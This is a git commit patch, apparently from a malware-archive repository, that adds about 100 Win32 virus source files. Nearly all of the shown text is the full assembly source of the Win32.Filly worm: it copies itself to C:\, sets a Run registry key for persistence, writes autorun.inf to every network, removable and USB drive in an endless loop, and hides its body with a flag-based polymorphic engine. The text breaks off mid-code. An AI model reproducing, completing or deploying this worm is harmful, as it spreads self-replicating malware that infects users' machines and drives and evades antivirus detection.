From 3cac606e5f340bc609f39eac0f3c9c081420c0a1 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 10 Oct 2020 22:07:43 -0500 Subject: [PATCH] Add files via upload --- Win32/Virus.Win32.Filly.txt | 1960 +++++ Win32/Virus.Win32.Ming.asm | 1028 +++ Win32/Virus.Win32.Spot.asm | 534 ++ Win32/Virus.WinREG.Antireg.b | 13 + Win32/Virus.WinREG.Sptohell | 24 + Win32/Virus.WinREG.Sptohell.b | 14 + Win32/Win32.99WaysToDie.asm | 1886 +++++ Win32/Win32.Abigor.ASM | 8857 ++++++++++++++++++++ Win32/Win32.Alicia.asm | 3312 ++++++++ Win32/Win32.Alma.asm | 1125 +++ Win32/Win32.Apathy.asm | 825 ++ Win32/Win32.Aris.asm | 1977 +++++ Win32/Win32.Astrix.asm | 2101 +++++ Win32/Win32.Atav.asm | 760 ++ Win32/Win32.Ataxia.asm | 341 + Win32/Win32.Bebop.asm | 634 ++ Win32/Win32.Benny.asm | 994 +++ Win32/Win32.Blaster.cpp | 1351 ++++ Win32/Win32.Bodom.asm | 561 ++ Win32/Win32.Bogus.4096.asm | 193 + Win32/Win32.Borges2.asm | 704 ++ Win32/Win32.Broken_face.asm | 342 + Win32/Win32.Butterflies.asm | 250 + Win32/Win32.CJD.asm | 12102 +++++++++++++++++++++++++++ Win32/Win32.Cabanas.2999.asm | 2642 ++++++ Win32/Win32.Carume.asm | 381 + Win32/Win32.Ceel.a.asm | 624 ++ Win32/Win32.Chthon.asm | 1810 +++++ Win32/Win32.Cichosz.asm | 328 + Win32/Win32.Clear.asm | 443 + Win32/Win32.Cleevix.asm | 717 ++ Win32/Win32.Cocaine.asm | 5767 +++++++++++++ Win32/Win32.Crash.asm | 224 + Win32/Win32.Crucio.asm | 729 ++ Win32/Win32.Crypto.asm | 8659 ++++++++++++++++++++ Win32/Win32.DDoS.asm | 2363 ++++++ Win32/Win32.Darling.asm | 944 +++ Win32/Win32.Demiurg.asm | 3633 +++++++++ Win32/Win32.Dengue.asm | 7158 ++++++++++++++++ Win32/Win32.Diablerie.asm | 1458 ++++ Win32/Win32.Dream.asm | 1844 +++++ Win32/Win32.Efishnc.asm | 3420 ++++++++ Win32/Win32.Efishnc.b.asm | 2817 +++++++ Win32/Win32.Efishnc.c.asm | 2852 +++++++ Win32/Win32.Egypt.asm | 2467 ++++++ Win32/Win32.Elkern.c.asm | 2579 ++++++ Win32/Win32.Emotion.asm | 267 + Win32/Win32.Enumero.asm | 1173 +++ Win32/Win32.Eva.asm | 686 ++ Win32/Win32.Fever.asm | 7158 ++++++++++++++++ Win32/Win32.FleA.asm | 82 + Win32/Win32.Fleabot.asm | 1192 +++ Win32/Win32.Fly.asm | 1037 +++ Win32/Win32.Foroux.a.asm | 2579 ++++++ Win32/Win32.Freebird.asm | 2259 ++++++ Win32/Win32.Gaybar.asm | 420 + Win32/Win32.Gemini.asm | 1998 +++++ Win32/Win32.Georgina.3657.asm | 1124 +++ Win32/Win32.H0rtiga.asm | 1606 ++++ Win32/Win32.Halen.asm | 961 +++ Win32/Win32.Harrier.asm | 3750 +++++++++ Win32/Win32.Hatred.asm | 3153 ++++++++ Win32/Win32.Heathen.asm | 2939 +++++++ Win32/Win32.HempHoper.asm | 4949 ++++++++++++ Win32/Win32.Heretic.asm | 882 ++ Win32/Win32.Hiv.asm | 2814 +++++++ Win32/Win32.Hortiga.asm | 1640 ++++ Win32/Win32.Idele.asm | 1788 ++++ Win32/Win32.Idyll.1556.asm | 689 ++ Win32/Win32.Imports.asm | 1106 +++ Win32/Win32.Infancy.asm | 565 ++ Win32/Win32.Infinite.asm | Bin 0 -> 36009 bytes Win32/Win32.Insomnia.txt | 468 ++ Win32/Win32.Isis.asm | 964 +++ Win32/Win32.Jacky.1440.asm | 1153 +++ Win32/Win32.Jeremy.asm | 354 + Win32/Win32.Jimmy.asm | 820 ++ Win32/Win32.Junkhtmail.asm | 3381 ++++++++ Win32/Win32.KaZaM.asm | 1695 ++++ Win32/Win32.Karazakira.asm | 567 ++ Win32/Win32.Kenston.asm | 772 ++ Win32/Win32.Kriz.asm | 2804 +++++++ Win32/Win32.LadyMarian.2.asm | 773 ++ Win32/Win32.LaraCroft.asm | 249 + Win32/Win32.Legacy.asm | 5676 +++++++++++++ Win32/Win32.Leviathan.asm | 1312 +++ Win32/Win32.Linda.asm | 370 + Win32/Win32.LittleRiot.asm | 54 + Win32/Win32.Magic.7045.asm | 655 ++ Win32/Win32.Mates.asm | 452 ++ Win32/Win32.Maya.4153.asm | 1121 +++ Win32/Win32.Maya.asm | 1319 +++ Win32/Win32.Mescaline.asm | 657 ++ Win32/Win32.Metaphor.asm | 13914 ++++++++++++++++++++++++++++++++ Win32/Win32.Morw.asm | 994 +++ Win32/Win32.Mutt.asm | 1307 +++ Win32/Win32.Nachtklinge.asm | 694 ++ Win32/Win32.Neo.asm | 1202 +++ Win32/Win32.Netscan.c | 245 + Win32/Win32.borges.asm | 213 + 100 files changed, 186749 insertions(+) create mode 100644 Win32/Virus.Win32.Filly.txt create mode 100644 Win32/Virus.Win32.Ming.asm create mode 100644 Win32/Virus.Win32.Spot.asm create mode 100644 Win32/Virus.WinREG.Antireg.b create mode 100644 Win32/Virus.WinREG.Sptohell create mode 100644 Win32/Virus.WinREG.Sptohell.b create mode 100644 Win32/Win32.99WaysToDie.asm create mode 100644 Win32/Win32.Abigor.ASM create mode 100644 Win32/Win32.Alicia.asm create mode 100644 Win32/Win32.Alma.asm create mode 100644 Win32/Win32.Apathy.asm create mode 100644 Win32/Win32.Aris.asm create mode 100644 Win32/Win32.Astrix.asm create mode 100644 Win32/Win32.Atav.asm create mode 100644 Win32/Win32.Ataxia.asm create mode 100644 Win32/Win32.Bebop.asm create mode 100644 Win32/Win32.Benny.asm create mode 100644 Win32/Win32.Blaster.cpp create mode 100644 Win32/Win32.Bodom.asm create mode 100644 Win32/Win32.Bogus.4096.asm create mode 100644 Win32/Win32.Borges2.asm create mode 100644 Win32/Win32.Broken_face.asm create mode 100644 Win32/Win32.Butterflies.asm create mode 100644 Win32/Win32.CJD.asm create mode 100644 Win32/Win32.Cabanas.2999.asm create mode 100644 Win32/Win32.Carume.asm create mode 100644 Win32/Win32.Ceel.a.asm create mode 100644 Win32/Win32.Chthon.asm create mode 100644 Win32/Win32.Cichosz.asm create mode 100644 Win32/Win32.Clear.asm create mode 100644 Win32/Win32.Cleevix.asm create mode 100644 Win32/Win32.Cocaine.asm create mode 100644 Win32/Win32.Crash.asm create mode 100644 Win32/Win32.Crucio.asm create mode 100644 Win32/Win32.Crypto.asm create mode 100644 Win32/Win32.DDoS.asm create mode 100644 Win32/Win32.Darling.asm create mode 100644 Win32/Win32.Demiurg.asm create mode 100644 Win32/Win32.Dengue.asm create mode 100644 Win32/Win32.Diablerie.asm create mode 100644 Win32/Win32.Dream.asm create mode 100644 Win32/Win32.Efishnc.asm create mode 100644 Win32/Win32.Efishnc.b.asm create mode 100644 Win32/Win32.Efishnc.c.asm create mode 100644 Win32/Win32.Egypt.asm create mode 100644 Win32/Win32.Elkern.c.asm create mode 100644 Win32/Win32.Emotion.asm create mode 100644 Win32/Win32.Enumero.asm create mode 100644 Win32/Win32.Eva.asm create mode 100644 Win32/Win32.Fever.asm create mode 100644 Win32/Win32.FleA.asm create mode 100644 Win32/Win32.Fleabot.asm create mode 100644 Win32/Win32.Fly.asm create mode 100644 Win32/Win32.Foroux.a.asm create mode 100644 Win32/Win32.Freebird.asm create mode 100644 Win32/Win32.Gaybar.asm create mode 100644 Win32/Win32.Gemini.asm create mode 100644 Win32/Win32.Georgina.3657.asm create mode 100644 Win32/Win32.H0rtiga.asm create mode 100644 Win32/Win32.Halen.asm create mode 100644 Win32/Win32.Harrier.asm create mode 100644 Win32/Win32.Hatred.asm create mode 100644 Win32/Win32.Heathen.asm create mode 100644 Win32/Win32.HempHoper.asm create mode 100644 Win32/Win32.Heretic.asm create mode 100644 Win32/Win32.Hiv.asm create mode 100644 Win32/Win32.Hortiga.asm create mode 100644 Win32/Win32.Idele.asm create mode 100644 Win32/Win32.Idyll.1556.asm create mode 100644 Win32/Win32.Imports.asm create mode 100644 Win32/Win32.Infancy.asm create mode 100644 Win32/Win32.Infinite.asm create mode 100644 Win32/Win32.Insomnia.txt create mode 100644 Win32/Win32.Isis.asm create mode 100644 Win32/Win32.Jacky.1440.asm create mode 100644 Win32/Win32.Jeremy.asm create mode 100644 Win32/Win32.Jimmy.asm create mode 100644 Win32/Win32.Junkhtmail.asm create mode 100644 Win32/Win32.KaZaM.asm create mode 100644 Win32/Win32.Karazakira.asm create mode 100644 Win32/Win32.Kenston.asm create mode 100644 Win32/Win32.Kriz.asm create mode 100644 Win32/Win32.LadyMarian.2.asm create mode 100644 Win32/Win32.LaraCroft.asm create mode 100644 Win32/Win32.Legacy.asm create mode 100644 Win32/Win32.Leviathan.asm create mode 100644 Win32/Win32.Linda.asm create mode 100644 Win32/Win32.LittleRiot.asm create mode 100644 Win32/Win32.Magic.7045.asm create mode 100644 Win32/Win32.Mates.asm create mode 100644 Win32/Win32.Maya.4153.asm create mode 100644 Win32/Win32.Maya.asm create mode 100644 Win32/Win32.Mescaline.asm create mode 100644 Win32/Win32.Metaphor.asm create mode 100644 Win32/Win32.Morw.asm create mode 100644 Win32/Win32.Mutt.asm create mode 100644 Win32/Win32.Nachtklinge.asm create mode 100644 Win32/Win32.Neo.asm create mode 100644 Win32/Win32.Netscan.c create mode 100644 Win32/Win32.borges.asm diff --git a/Win32/Virus.Win32.Filly.txt b/Win32/Virus.Win32.Filly.txt new file mode 100644 index 00000000..7bec3775 --- /dev/null +++ b/Win32/Virus.Win32.Filly.txt @@ -0,0 +1,1960 @@ +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; Win32.Filly +;; by SPTH +;; February 2012 +;; +;; +;; This is a worm which spreads via network/removable/USB drives. +;; +;; It uses a novel polymorphic engine, namely the virusbody is created +;; at runtime using flags. The virusbody does not exist in any encrypted +;; data or transformed code, but just appears as shadow of the execution of +;; some overlayed instruction-flow. +;; +;; Every nibble (half byte) of the virus is represented as a code which +;; sets or clears SF,AF,PF,CF. After the code snippet of one nibble is +;; executed, either LAHF or PUSHFD is used to get the flags. The flags +;; are saved in an allocated memory, which will be executed after +;; the reconstruction. +;; +;; It can use one out of 5 ways to fully determine SF,AF,PF,CF: +;; +;; 5 | 0+4 | 1+4 | 2+4 | 4+0 +;; +;; where each number represents a set of instruction with different behaviour +;; with respect to flags: +;; +;; 0: CF: +;; ROL, ROR +;; +;; 1: AF, CF (PF, SF undefined): +;; AAA, AAS +;; +;; 2: CF PF (AF undefined, SF undefined); +;; SHL, SHR, SAL, SAR +;; +;; 3: PF SF (AF undefined, CF undefined): +;; AND, XOR, TEST +;; +;; 4: AF PF SF: +;; DEC, INC +;; +;; 5: AF CF PF SF: +;; ADD, CMP, NEG, SUB +;; +;; All sets can be used as functional trash code, prior to the actual determining +;; instruction sets. Registers and type (Instr Reg1, Reg2 or Instr Reg1, NNNN) are +;; random in that case. +;; +;; For finding the correct composition of instruction and register values to get +;; the the desired flag combination, I use a semi-deterministic algorithm. This means +;; i give correct flag dependences, the the code goes in a loop searching randomly +;; for correct parameters - for each nibble of the code. In some cases, a desired +;; combination of flags can not be created with the choosen instruction - in that case +;; after 42 loops, an infinite-loop handler is called, which exits the loops and choses +;; another instruction to create the flag-combination. This procedere is unexpectedly +;; fast - in fact, even there are ~6100 random loops running, there is no noticeable +;; delay. +;; +;; The encrypted code-flow has a different size each generation. As its boring to code a +;; file size adjustment tool, I keep a constant filesize with following statistical +;; argument: In a set of 20 different files, I looked at the maximum size the used +;; code section: 175713, 175477, 175261, 175262, 177070, 176241, 177109, 175749, 172610, +;; 176471, 174657, 174682, 175275, 176186, 176004, 174359, 173549, 174638, 174684, 173893 bytes. +;; Average of the set: 175269 +/- 1148.65. +;; For padding, I used average + 7 sigma = 183'312. The probability that something +;; goes wrong is 1 / (390'682'215'445), while the probability that everything goes +;; right is 99.999999999744% - this is enough for my taste :) +;; +;; Now here you can see a generated code: +;; +;; 004020B5 . B8 A0AC599E MOV EAX,9E59ACA0 +;; 004020BA . C1E0 82 SHL EAX,82 +;; 004020BD . B8 A5AF1B60 MOV EAX,601BAFA5 +;; 004020C2 . 48 DEC EAX +;; 004020C3 . 9C PUSHFD +;; 004020C4 . 5A POP EDX +;; 004020C5 . 8817 MOV BYTE PTR DS:[EDI],DL +;; 004020C7 . 47 INC EDI +;; 004020C8 . B9 CBC5FCAC MOV ECX,ACFCC5CB +;; 004020CD . B8 550D859F MOV EAX,9F850D55 +;; 004020D2 . 29C1 SUB ECX,EAX +;; 004020D4 . 9C PUSHFD +;; 004020D5 . 58 POP EAX +;; 004020D6 . AA STOS BYTE PTR ES:[EDI] +;; 004020D7 . B8 CB5183AB MOV EAX,AB8351CB +;; 004020DC . B9 EEF33292 MOV ECX,9232F3EE +;; 004020E1 . D3C0 ROL EAX,CL +;; 004020E3 . BA 8B47E2EB MOV EDX,EBE2478B +;; 004020E8 . 4A DEC EDX +;; 004020E9 . 9F LAHF +;; 004020EA . 8827 MOV BYTE PTR DS:[EDI],AH +;; 004020EC . 47 INC EDI +;; 004020ED . BA F065255E MOV EDX,5E2565F0 +;; 004020F2 . B9 A5D9FA8B MOV ECX,8BFAD9A5 +;; 004020F7 . 01CA ADD EDX,ECX +;; 004020F9 . B8 8E0FB438 MOV EAX,38B40F8E +;; 004020FE . 3F AAS +;; 004020FF . BB 6B6AF3EA MOV EBX,EAF36A6B +;; 00402104 . B8 7B9CB043 MOV EAX,43B09C7B +;; 00402109 . 01C3 ADD EBX,EAX +;; 0040210B . 9F LAHF +;; 0040210C . 8827 MOV BYTE PTR DS:[EDI],AH +;; 0040210E . 47 INC EDI +;; +;; This code generates 2 bytes of the virus code. +;; +;; +;; +;; Thanks alot to hh86 for telling me about this non-standard code +;; representation she is working on, and for pointing out that LAHF +;; is actually *very* useful :) +;; +;; This is the second member of a new series of self-replicators: +;; - Win32.Kitti (overlapping code engine; in valhalla#1) +;; - Win32.Filly (code as shadow of overlayed instruction flow; in valhalla#2) +;; +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + + +include 'E:\Programme\FASM\INCLUDE\win32ax.inc' + +.data + hMyFileName dd 0x0 + hFileHandle dd 0x0 + hMapHandle dd 0x0 + hMapViewAddress dd 0x0 + + hFileCodeStart dd 0x0 + + RandomNumber dd 0x0 + + SpaceForHDC: dd 0x0 ; should be 0x0, C:\ + RandomFileName: times 13 db 0x0 + + + SpaceForHDC2: dd 0x0 ; should be 0x0, X:\ + RandomFileName2:times 13 db 0x0 + + stKey: times 47 db 0x0 ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0x0 + hKey dd 0x0 + + + stAutorunWithDrive db 0x0, 0x0, 0x0 ; "X:\" + stAutoruninf: times 12 db 0x0 ; "autorun.inf" + + + + stAutoRunContent: times 52 db 0x0 + + + hCreateFileAR dd 0x0 + hCreateFileMappingAR dd 0x0 + + constFileSize EQU 185344 + constCodeStart EQU 0x400 + + FlagMask db 0x0 ; S00A'0P1C + MaskNibble0 EQU 0000'0001b + MaskNibble1 EQU 0001'0001b + MaskNibble2 EQU 0000'0101b + MaskNibble3 EQU 1000'0100b + MaskNibble4 EQU 1001'0100b + MaskNibble5 EQU 1001'0101b + MaskRandom EQU 0000'0000b ; no content - for trash + + VerifiedAddress dd 0x0 + + + MyStartAddresse dd 0x0 + + NibbleData db 0x0 + + DecryptedCode dd 0x0 + + + +.code +start: +; ########################################################################### +; ##### +; ##### Preparation (copy file, get kernel, ...) +; ##### + +StartEngine: + call GetMyStartAddresse + GetMyStartAddresse: + pop eax + sub eax, (GetMyStartAddresse-StartEngine) + + mov dword[MyStartAddresse], eax + + + + push 0x8007 + stdcall dword[SetErrorMode] + + stdcall dword[GetCommandLineA] + mov dword[hMyFileName], eax + cmp byte[eax], '"' + jne FileNameIsFine + inc eax + mov dword[hMyFileName], eax + + FindFileNameLoop: + inc eax + cmp byte[eax], '"' + jne FindFileNameLoop + + mov byte[eax], 0x0 + FileNameIsFine: + + + stdcall dword[GetTickCount] + mov dword[RandomNumber], eax + + xor esi, esi + CopyFileAndRegEntryMore: + mov ebx, 26 + mov ecx, 97 + call CreateSpecialRndNumber + + mov byte[RandomFileName+esi], dl + inc esi + cmp esi, 8 + jb CopyFileAndRegEntryMore + + mov eax, ".exe" + mov dword[RandomFileName+esi], eax + + mov al, "C" + mov byte[SpaceForHDC+1], al + mov al, ":" + mov byte[SpaceForHDC+2], al + mov al, "\" + mov byte[SpaceForHDC+3], al + + push FALSE + push SpaceForHDC+1 + push dword[hMyFileName] + stdcall dword[CopyFileA] + + + +; ##### +; ##### Preparation (copy file, get kernel, ...) +; ##### +; ########################################################################### + + +; ########################################################################### +; ##### +; ##### Open New File +; ##### + + push 0x0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_ALWAYS + push 0x0 + push 0x0 + push (GENERIC_READ or GENERIC_WRITE) + push SpaceForHDC+1 + stdcall dword[CreateFileA] + + cmp eax, INVALID_HANDLE_VALUE + je IVF_NoCreateFile + mov dword[hFileHandle], eax + + push 0x0 + push constFileSize + push 0x0 ; nFileSizeHigh=0 from above + push PAGE_READWRITE + push 0x0 + push dword[hFileHandle] + stdcall dword[CreateFileMappingA] + + cmp eax, 0x0 + je IVF_NoCreateMap + mov dword[hMapHandle], eax + + push constFileSize + push 0x0 + push 0x0 + push FILE_MAP_WRITE + push dword[hMapHandle] + stdcall dword[MapViewOfFile] + + cmp eax, 0x0 + je IVF_NoMapView + mov dword[hMapViewAddress], eax + +; ##### +; ##### Open New File +; ##### +; ########################################################################### + + call DoNibbleTrafo + + +; ########################################################################### +; ##### +; ##### Close New File +; ##### + + IVF_CloseMapView: + push dword[hMapViewAddress] + stdcall dword[UnmapViewOfFile] + + IVF_NoMapView: + push dword[hMapHandle] + stdcall dword[CloseHandle] + + IVF_NoCreateMap: + push dword[hFileHandle] + stdcall dword[CloseHandle] + + IVF_NoCreateFile: + +; ##### +; ##### Close New File +; ##### +; ########################################################################### + + +; invoke ExitProcess, 0 + +; ########################################################################### +; ##### +; ##### Spread this kitty ;) +; ##### + +SpreadKitty: +; Representation of "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" +; One could permute it - but too lazy for doing this task atm :) + + mov eax, stKey + mov dword[eax+0x00], "SOFT" + mov dword[eax+0x04], "WARE" + mov dword[eax+0x08], "\Mic" + mov dword[eax+0x0C], "roso" + mov dword[eax+0x10], "ft\W" + mov dword[eax+0x14], "indo" + mov dword[eax+0x18], "ws\C" + mov dword[eax+0x1C], "urre" + mov dword[eax+0x20], "ntVe" + mov dword[eax+0x24], "rsio" + mov dword[eax+0x28], "n\Ru" + mov byte[eax+0x2C], "n" + + push 0x0 + push hKey + push 0x0 + push KEY_ALL_ACCESS + push REG_OPTION_NON_VOLATILE + push 0x0 + push 0x0 + push stKey + push HKEY_LOCAL_MACHINE + stdcall dword[RegCreateKeyExA] + + push 16 + push SpaceForHDC+1 + push REG_SZ + push 0x0 + push 0x0 + push dword[hKey] + stdcall dword[RegSetValueExA] + + push dword[hKey] + stdcall dword[RegCloseKey] + + xor eax, eax + mov dword[stAutorunWithDrive], "X:\a" + mov dword[stAutorunWithDrive+2], "\aut" + mov dword[stAutoruninf+3], "orun" + mov dword[stAutoruninf+7], ".inf" + + mov dword[stAutoRunContent], "[Aut" + mov dword[stAutoRunContent+0x04], "orun" + mov dword[stAutoRunContent+0x08], 0x530A0D5D + mov dword[stAutoRunContent+0x0C], "hell" ; !!!!!!! + mov dword[stAutoRunContent+0x10], "Exec" + mov dword[stAutoRunContent+0x14], "ute=" + mov eax, dword[RandomFileName] ; Filename: XXXXxxxx.exe + mov dword[stAutoRunContent+0x18], eax + mov eax, dword[RandomFileName+0x4] ; Filename: xxxxXXXX.exe + mov dword[stAutoRunContent+0x1C], eax + mov dword[stAutoRunContent+0x20], ".exe" + mov dword[stAutoRunContent+0x24], 0x73550A0D + mov dword[stAutoRunContent+0x28], "eAut" + mov dword[stAutoRunContent+0x2C], "opla" + mov dword[stAutoRunContent+0x30], 0x00313D79 + + ; i like that coding style, roy g biv! :)) + push 51 + push 0x0 + push 0x0 + push FILE_MAP_ALL_ACCESS + push 0x0 + push 51 + push 0x0 + push PAGE_READWRITE + push 0x0 + push 0x0 + push FILE_ATTRIBUTE_HIDDEN + push OPEN_ALWAYS + push 0x0 + push 0x0 + push (GENERIC_READ or GENERIC_WRITE) + push stAutoruninf + + stdcall dword[CreateFileA] + push eax + mov dword[hCreateFileAR], eax + stdcall dword[CreateFileMappingA] + push eax + mov dword[hCreateFileMappingAR], eax + stdcall dword[MapViewOfFile] + + xor cl, cl + mov esi, stAutoRunContent + MakeAutoRunInfoMore: + mov bl, byte[esi] + mov byte[eax], bl + inc eax + inc esi + inc ecx + cmp cl, 51 + jb MakeAutoRunInfoMore + + sub eax, 51 + push dword[hCreateFileAR] + push dword[hCreateFileMappingAR] + push eax + stdcall dword[UnmapViewOfFile] + stdcall dword[CloseHandle] + stdcall dword[CloseHandle] + + mov dword[SpaceForHDC2+1], "A:\." + mov eax, dword[RandomFileName] + mov dword[RandomFileName2], eax ; XXXXxxxx.exe + mov eax, dword[RandomFileName+0x04] + mov dword[RandomFileName2+0x04], eax ; xxxxXXXX.exe + mov eax, dword[RandomFileName+0x08] + mov dword[RandomFileName2+0x08], eax ; .exe + + + SpreadKittyAnotherTime: + mov dword[SpaceForHDC2], 0x003A4100 ; 0x0, "A:", 0x0 + + STKAnotherRound: + push SpaceForHDC2+1 + stdcall dword[GetDriveTypeA] + + xor ebx, ebx ; 0 ... No Drive + ; 1 ... Drive (without autorun.inf) + ; 2 ... Drive (with autorun.inf) + + mov cl, '\' + mov byte[SpaceForHDC2+3],cl + + + cmp al, 0x2 + je STKWithAutoRun + + cmp al, 0x3 + je STKWithoutAutoRun + + cmp al, 0x4 + je STKWithAutoRun + + cmp al, 0x6 + je STKWithAutoRun + + jmp STKCreateEntriesForNextDrive + + STKWithAutoRun: + + push FALSE + push stAutorunWithDrive + push stAutoruninf + stdcall dword[CopyFileA] + + STKWithoutAutoRun: + + push FALSE + push SpaceForHDC2+1 + push SpaceForHDC+1 + stdcall dword[CopyFileA] + + + STKCreateEntriesForNextDrive: + xor eax, eax + mov al, byte[SpaceForHDC2+1] + cmp al, "Z" + je SpreadThisKittyEnd + + inc al + mov byte[SpaceForHDC2+1], al ; next drive + mov byte[stAutorunWithDrive], al ; next drive + mov byte[SpaceForHDC2+3], ah ; 0x0, "X:", 0x0 + jmp STKAnotherRound + + + SpreadThisKittyEnd: + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, (0x8000 - 1) ; 0-32 sec + + push eax + stdcall dword[Sleep] + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, (0x100-1) + jnz SpreadKittyAnotherTime + +jmp SpreadKittyAnotherTime + +; ##### +; ##### Spread this kitty ;) +; ##### +; ########################################################################### + + + +DoNibbleTrafo: + + mov edi, dword[hMapViewAddress] + add edi, constCodeStart + +;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; First create the VirtualAlloc code and save the value +;; + + virtual at 0 ; cool FASM feature: + ; this compiles code virtually + ; and one can use variables to access it + ; ideal for our purpose :) + invoke VirtualAlloc, 0x0, 100'000, 0x1000, PAGE_EXECUTE_READWRITE + mov dword[DecryptedCode], eax + xchg edi, eax + mov edi, edi ; just for padding... + ; uuhh, do we know this instruction? ;) + + load iVirtualCodeA dword from 0 + load iVirtualCodeB dword from 4 + load iVirtualCodeC dword from 8 + load iVirtualCodeD dword from 12 + load iVirtualCodeE dword from 16 + load iVirtualCodeF dword from 20 + load iVirtualCodeG dword from 24 ; i hate "word", 2byte data-types. + end virtual ; they are just unelegant... + + + mov dword[edi+00], iVirtualCodeA + mov dword[edi+04], iVirtualCodeB + mov dword[edi+08], iVirtualCodeC + mov dword[edi+12], iVirtualCodeD + mov dword[edi+16], iVirtualCodeE + mov dword[edi+20], iVirtualCodeF + mov dword[edi+24], iVirtualCodeG + add edi, 26 + + mov dword[VerifiedAddress], edi + +;; +;; First create the VirtualAlloc code and save the value +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;; + + +;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; Now create the whole representation of the code in form of flags +;; of some other random code ( main engine ) +;; + mov esi, dword[MyStartAddresse] + + CreateCodeForAllBytes: + mov al, byte[esi] + + mov byte[NibbleData], al + and byte[NibbleData], 0000'1111b + push esi + call CreateCodeForNibble + pop esi + + mov al, byte[esi] + shr al, 4 ; get the second nibble of this byte + mov byte[NibbleData], al + and byte[NibbleData], 0000'1111b + push esi + call CreateCodeForNibble + pop esi + + inc esi + + mov ebx, dword[MyStartAddresse] + add ebx, (WholeCodeEnd-StartEngine) + cmp esi, ebx + jne CreateCodeForAllBytes + + +;; +;; Now create the whole representation of the code in form of flags +;; of some other random code ( main engine ) +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; In the end, rearrange the information to extract the viral code +;; + + virtual at 0 + mov ecx, dword[DecryptedCode] + mov edx, ecx + + ReorganizeMore: + mov bh, byte[ecx] + inc ecx + push 0 ; Some PIC workaround :) + jmp Decrypt + ReorganizeFirstNibbleBack: + + and al, 0000'1111b + push eax + + + + mov bh, byte[ecx] + inc ecx + + push 1 + jmp Decrypt + ReorganizeSecondNibbleBack: + + and al, 0000'1111b + shl al, 4 + pop ebx + add al, bl + + mov byte[edx], al + inc edx + mov eax, dword[DecryptedCode] + add eax, (WholeCodeEnd-StartEngine) + + cmp edx, eax + jne ReorganizeMore + + jmp dword[DecryptedCode] + + + Decrypt: + + ; in: bh=S00A'0P1C + ; out: al=0000'SAPC + mov al, bh ; al=S00A'0P1C + and al, 0000'0001b ; al=0000'000C + + shr bh, 1 ; bh=0S00'A0P1 + push ebx + and bh, 0000'0010b ; bh=0000'00P0 + add al, bh ; al=0000'00PC + + pop ebx ; bh=0S00'A0P1 + shr bh, 1 ; bh=00S0'0A0P + push ebx + and bh, 0000'0100b ; bh=0000'0A00 + add al, bh ; al=0000'0APC + + pop ebx ; bh=00S0'0A0P + shr bh, 2 ; bh=0000'S00A + and bh, 0000'1000b ; bh=0000'S000 + add al, bh ; al=0000'SAPC + + pop ebx + test ebx, ebx + + jz ReorganizeFirstNibbleBack + jmp ReorganizeSecondNibbleBack + + load cVirtualCodeA dword from 0 ; Most likely there is a more elegant + load cVirtualCodeB dword from 4 ; way to handle this requirement + load cVirtualCodeC dword from 8 ; using a FASM macro. + load cVirtualCodeD dword from 12 + load cVirtualCodeE dword from 16 ; But i couldnt find one - tell me + load cVirtualCodeF dword from 20 ; if you know a way to copy data + load cVirtualCodeG dword from 24 ; to a memory addresse from a + load cVirtualCodeH dword from 28 ; virtual compilation space. + load cVirtualCodeI dword from 32 + load cVirtualCodeJ dword from 36 + load cVirtualCodeK dword from 40 + load cVirtualCodeL dword from 44 + load cVirtualCodeM dword from 48 + load cVirtualCodeN dword from 52 + load cVirtualCodeO dword from 56 + load cVirtualCodeP dword from 60 + load cVirtualCodeQ dword from 64 + load cVirtualCodeR dword from 68 + load cVirtualCodeS dword from 72 + load cVirtualCodeT dword from 76 + load cVirtualCodeU dword from 80 + load cVirtualCodeV dword from 84 + load cVirtualCodeW dword from 88 + load cVirtualCodeX byte from 92 + + end virtual + + mov dword[edi+00], cVirtualCodeA + mov dword[edi+04], cVirtualCodeB + mov dword[edi+08], cVirtualCodeC + mov dword[edi+12], cVirtualCodeD + mov dword[edi+16], cVirtualCodeE + mov dword[edi+20], cVirtualCodeF + + mov dword[edi+24], cVirtualCodeG + mov dword[edi+28], cVirtualCodeH + mov dword[edi+32], cVirtualCodeI + mov dword[edi+36], cVirtualCodeJ + mov dword[edi+40], cVirtualCodeK + + mov dword[edi+44], cVirtualCodeL + mov dword[edi+48], cVirtualCodeM + mov dword[edi+52], cVirtualCodeN + mov dword[edi+56], cVirtualCodeO + mov dword[edi+60], cVirtualCodeP + + mov dword[edi+64], cVirtualCodeQ + mov dword[edi+68], cVirtualCodeR + mov dword[edi+72], cVirtualCodeS + mov dword[edi+76], cVirtualCodeT + mov dword[edi+80], cVirtualCodeU + + mov dword[edi+84], cVirtualCodeV + mov dword[edi+88], cVirtualCodeW + mov byte[edi+92], cVirtualCodeX + +;; +;; In the end, rearrange the information to extract the viral code +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;; + + +ret + + +CreateCodeForNibble: +; 5 possible algos: +; -> 5 +; -> 0+4 | 1+4 |2+4 +; -> 4+0 + + + CreateCodeBeginTrash: + call GetRandomNumber + test byte[RandomNumber+1], 0000'0011b + jnz DoNibbleFindAlgo_NoTrashBegin + mov byte[FlagMask], MaskRandom + mov bl, byte[RandomNumber+2] + call GetRandomNumber + + mov al, byte[RandomNumber] + and al, 0000'0111b + + jz GC_Trash_Not0 + call GenerateNibble0 + jmp CreateCodeBeginTrash + + GC_Trash_Not0: + dec al + jz GC_Trash_Not1 + call GenerateNibble1 + jmp CreateCodeBeginTrash + + GC_Trash_Not1: + dec al + jz GC_Trash_Not2 + call GenerateNibble2 + jmp CreateCodeBeginTrash + + GC_Trash_Not2: + dec al + jz GC_Trash_Not3 + call GenerateNibble3 + jmp CreateCodeBeginTrash + + GC_Trash_Not3: + dec al + jz 